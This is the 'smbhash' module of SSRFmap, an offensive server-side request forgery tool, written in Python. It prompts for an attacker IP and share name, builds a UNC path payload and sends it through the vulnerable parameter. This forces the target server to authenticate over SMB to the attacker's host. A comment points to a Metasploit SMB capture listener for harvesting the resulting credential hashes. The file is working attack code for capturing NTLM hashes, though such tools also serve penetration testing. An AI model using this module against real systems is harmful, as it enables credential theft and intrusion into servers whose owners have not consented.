SSRFmap/modules/smbhash.py

31 lines
936 B
Python
Raw Normal View History

from core.utils import *
import logging
# NOTE
# Use auxiliary/server/capture/smb from Metasploit to setup a listener
name = "smbhash"
description = "Force an SMB authentication attempt by embedding a UNC path (\\SERVER\SHARE) "
author = "Swissky"
documentation = []
class exploit():
UNC_EXAMPLE = "\\\\192.168.1.2\\SSRFmap"
UNC_IP = "192.168.1.2"
UNC_FILE = "SSRFmap"
def __init__(self, requester, args):
logging.info(f"Module '{name}' launched !")
UNC_IP = input("UNC IP (default: 192.168.1.2): ")
if UNC_IP != '':
self.UNC_IP = UNC_IP
UNC_FILE = input("UNC File (default: SSRFmap): ")
if UNC_FILE != '':
self.UNC_FILE = UNC_FILE
payload = wrapper_unc(self.UNC_FILE, self.UNC_IP)
r = requester.do_request(args.param, payload)
logging.info(f"\033[32mSending UNC Path\033[0m : {payload}")